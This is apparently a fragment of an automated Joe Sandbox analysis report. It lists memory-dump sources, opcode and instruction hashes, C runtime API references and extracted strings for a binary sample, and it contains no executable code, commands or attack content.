                                                                                    • Opcode Fuzzy Hash: d4d8a03620f88d47a59a689a03ce17e6a1acac77ac9e6fb44b30a0d68c787ca8
                                                                                    • Instruction Fuzzy Hash: 9E51E530514189AFCB05DF29D890BA93BE2EF89355F18C56DFD2A8F245C234E690DF94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d92cecd2605a4a54c3c77a7818072cb13fec83a53a324c2d874d283639e4868
                                                                                    • Instruction ID: cc6564f2924c26621e2f09c9e675ad81e27a18b88c1883f962684685fccc598a
                                                                                    • Opcode Fuzzy Hash: 0d92cecd2605a4a54c3c77a7818072cb13fec83a53a324c2d874d283639e4868
                                                                                    • Instruction Fuzzy Hash: 0121B373F205394B7B0CC47E8C522BDB6E1C68C601745823AE8A6EA2C1D968D917E2E4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b63d64401bd7e6c0b9e96cbe20f5ac7b232a30cab2b22ebf5df1188a7b10d86
                                                                                    • Instruction ID: 498c3e12db3d9d7c116104663d33ce594d46e6818fb6ba48810e22156b503420
                                                                                    • Opcode Fuzzy Hash: 1b63d64401bd7e6c0b9e96cbe20f5ac7b232a30cab2b22ebf5df1188a7b10d86
                                                                                    • Instruction Fuzzy Hash: 28219445E1A6A84BDB00593ED890782BFC1C796329F6CD3F4D8588FBDED515A40AC3E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 01edfb737f854c5f6fd1a91468da5878712d26802d0051557d9da052a610b863
                                                                                    • Instruction ID: 1322b84d3669770c5e9414fc1442d6a7c26bd778d25674eb0379077ff8fba579
                                                                                    • Opcode Fuzzy Hash: 01edfb737f854c5f6fd1a91468da5878712d26802d0051557d9da052a610b863
                                                                                    • Instruction Fuzzy Hash: 1C11CA23F30C255B675C816D8C132BE91D2EBD824070F533AD826E7284E9A4DE13D290
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction ID: 7e418de33b78823bd15b9f4dbb54226bfa0e5503d21da4507a0114ebb7ee6af2
                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                    • Instruction Fuzzy Hash: DB112B7760008A83D6188A2EC4B47B6E7D5EFD73E0B2D43FAD2464B758D222A94D9600
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 858e7b9b8f89abda53e995bf705560342153d45e2927cfa6cabf3195b3abe9c3
                                                                                    • Instruction ID: 4775639eba02275bebe950c42e54e6a9d0faef5a2bb1377e6dcd9efad36a5b17
                                                                                    • Opcode Fuzzy Hash: 858e7b9b8f89abda53e995bf705560342153d45e2927cfa6cabf3195b3abe9c3
                                                                                    • Instruction Fuzzy Hash: CAE08C72911238EBCB14DBC8C95598AF3EDEB45B40B154496F501D3200C270DE40E7D0
                                                                                    APIs
                                                                                    Strings
                                                                                    • Missing ':' after object member name, xrefs: 00BBE6F3
                                                                                    • Missing ',' or '}' in object declaration, xrefs: 00BBE807
                                                                                    • Missing '}' or object member name, xrefs: 00BBE8CC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task$std::ios_base::good
                                                                                    • String ID: Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name
                                                                                    • API String ID: 683101471-3980781130
                                                                                    • Opcode ID: 9486caff7d39e3dc81840b98f74d39a76bcd0af52ae2f0fce4cf1efdc3e6483c
                                                                                    • Instruction ID: 676cdd360482e6e70a8bba8c0ca3aa2607f10b8cb6740f0f1e0199b16710d190
                                                                                    • Opcode Fuzzy Hash: 9486caff7d39e3dc81840b98f74d39a76bcd0af52ae2f0fce4cf1efdc3e6483c
                                                                                    • Instruction Fuzzy Hash: 0CD14B30914258DBCB24EBA4CC91BFEBBB4BF21304F5481D9E066A71A2DFB05E49DB51
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Smanip
                                                                                    • String ID: 0$0$1$1$1$2$20220325143744$3$4$5$6$7$8$9$?
                                                                                    • API String ID: 2140389272-3399884654
                                                                                    • Opcode ID: 7115b8c3c95a5b7d140186848893eab24995230d93a40431fc602df6d7de7bb8
                                                                                    • Instruction ID: 4bb3377faf18bf2e28a3c2954d4e84c8a358f077069d18903a5fb09aa6f86b8b
                                                                                    • Opcode Fuzzy Hash: 7115b8c3c95a5b7d140186848893eab24995230d93a40431fc602df6d7de7bb8
                                                                                    • Instruction Fuzzy Hash: 7AB1C5119191D559D70A826C40A43FEAFFB9BA3340FAC84E9C2925F783C1BA8BC5C791
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Smanip
                                                                                    • String ID: 0$0$1$1$1$2$20220325143753$3$4$5$6$7$8$9$?
                                                                                    • API String ID: 2140389272-90625476
                                                                                    • Opcode ID: fae060f737760d271613ec4d7035adf01432e55ec1997fc4a2371352a98d2754
                                                                                    • Instruction ID: 5d430bb16f5cf4748751c4422d4d1b6fc5d658f381fbde5dd0da633083b9511a
                                                                                    • Opcode Fuzzy Hash: fae060f737760d271613ec4d7035adf01432e55ec1997fc4a2371352a98d2754
                                                                                    • Instruction Fuzzy Hash: 8CB1C61190C2D559EB0A476840A43FEAFFB8B67340FAC81E9E5815FB87C57A4BC9C391
                                                                                    APIs
                                                                                    • task.LIBCPMTD ref: 00BC0622
                                                                                    • task.LIBCPMTD ref: 00BC0671
                                                                                    • task.LIBCPMTD ref: 00BC06C4
                                                                                    • task.LIBCPMTD ref: 00BC072F
                                                                                    • task.LIBCPMTD ref: 00BC0780
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC0792
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC07CA
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC07EE
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC081D
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BC0852
                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00BC087D
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC0891
                                                                                    • task.LIBCPMTD ref: 00BC08DD
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC092E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::task_continuation_context::task_continuation_contexttask$Affinity::operator!=Concurrency::details::Hardware
                                                                                    • String ID: null
                                                                                    • API String ID: 1422003168-634125391
                                                                                    • Opcode ID: a76ab983dfbd968eb55726c1643604020ba708c4950d4b564868ffbce973a67e
                                                                                    • Instruction ID: bf1f94a907516e5c9597070c6e705943aecd1e7ef13b90708d0e17b5ee140807
                                                                                    • Opcode Fuzzy Hash: a76ab983dfbd968eb55726c1643604020ba708c4950d4b564868ffbce973a67e
                                                                                    • Instruction Fuzzy Hash: 03C10770D14108DBDB18EFA8D8A1FFEB7B5AF48304F5081ADE1167B292DB706A05CB65
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: Bad escape sequence in string$Empty escape sequence in string$S
                                                                                    • API String ID: 1384045349-4237285769
                                                                                    • Opcode ID: 2dbd74931efa7ad0947082c887e0ea02a15446664d51097d954df7f815d521ef
                                                                                    • Instruction ID: e5695e32d05eafd468d42ecb1ec5144b1b93ba009737db0d227779890439de9a
                                                                                    • Opcode Fuzzy Hash: 2dbd74931efa7ad0947082c887e0ea02a15446664d51097d954df7f815d521ef
                                                                                    • Instruction Fuzzy Hash: 91713B71A04108DFCB08DF98D891EFEBBF1BF49310F648299E5166B291CBB06E05CB51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %.16g$%02d$%04d$%06.3f$%lld$W$string or blob too big
                                                                                    • API String ID: 0-4289744004
                                                                                    • Opcode ID: c0f3bf4c46ad5d61f4771fae332109dd78a508313a62d2c32b98842ac5f03b51
                                                                                    • Instruction ID: 8bca40c0d9e8e3b9a7b5e0072a83883cdf96b1fb69008d8538d2411f2972e016
                                                                                    • Opcode Fuzzy Hash: c0f3bf4c46ad5d61f4771fae332109dd78a508313a62d2c32b98842ac5f03b51
                                                                                    • Instruction Fuzzy Hash: 02E133719087819BD721CF28C841BAABBE1FF92304F854A9CFCE467291D731D885CB92
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 00C15E2C
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C14FAE
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C14FC0
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C14FD2
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C14FE4
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C14FF6
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C15008
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C1501A
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C1502C
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C1503E
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C15050
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C15062
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C15074
                                                                                      • Part of subcall function 00C14F91: _free.LIBCMT ref: 00C15086
                                                                                    • _free.LIBCMT ref: 00C15E21
                                                                                      • Part of subcall function 00C0D859: RtlFreeHeap.NTDLL(00000000,00000000,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?), ref: 00C0D86F
                                                                                      • Part of subcall function 00C0D859: GetLastError.KERNEL32(?,?,00C156E6,?,00000000,?,?,?,00C15989,?,00000007,?,?,00C15F7F,?,?), ref: 00C0D881
                                                                                    • _free.LIBCMT ref: 00C15E43
                                                                                    • _free.LIBCMT ref: 00C15E58
                                                                                    • _free.LIBCMT ref: 00C15E63
                                                                                    • _free.LIBCMT ref: 00C15E85
                                                                                    • _free.LIBCMT ref: 00C15E98
                                                                                    • _free.LIBCMT ref: 00C15EA6
                                                                                    • _free.LIBCMT ref: 00C15EB1
                                                                                    • _free.LIBCMT ref: 00C15EE9
                                                                                    • _free.LIBCMT ref: 00C15EF0
                                                                                    • _free.LIBCMT ref: 00C15F0D
                                                                                    • _free.LIBCMT ref: 00C15F25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 7f264c974ed93515b563b443cb2b7fecc27e37fe47fe6f53085775d9dc62fcac
                                                                                    • Instruction ID: fa16924ea1b4651a7617cc83a2a748dc9d22cf71058e1a4be41646d62a44c3c4
                                                                                    • Opcode Fuzzy Hash: 7f264c974ed93515b563b443cb2b7fecc27e37fe47fe6f53085775d9dc62fcac
                                                                                    • Instruction Fuzzy Hash: 32318F31910B01DFEB20AAB9D845B9673E8EF82314F14852AE06AD75D1DF74EE81EB50
                                                                                    APIs
                                                                                      • Part of subcall function 00BA5030: std::_Lockit::_Lockit.LIBCPMT ref: 00BA505D
                                                                                      • Part of subcall function 00BA5030: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA512C
                                                                                    • _Mpunct.LIBCPMTD ref: 00BB7D02
                                                                                    • ctype.LIBCPMTD ref: 00BB7D7D
                                                                                    • operator!=.LIBCPMTD ref: 00BB7D90
                                                                                    • operator!=.LIBCPMTD ref: 00BB7E5D
                                                                                    • operator!=.LIBCPMTD ref: 00BB7EA4
                                                                                    • operator!=.LIBCPMTD ref: 00BB7F99
                                                                                    • _Find_elem.LIBCPMTD ref: 00BB7FBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: operator!=$Lockitstd::_$Find_elemLockit::_Lockit::~_Mpunctctype
                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
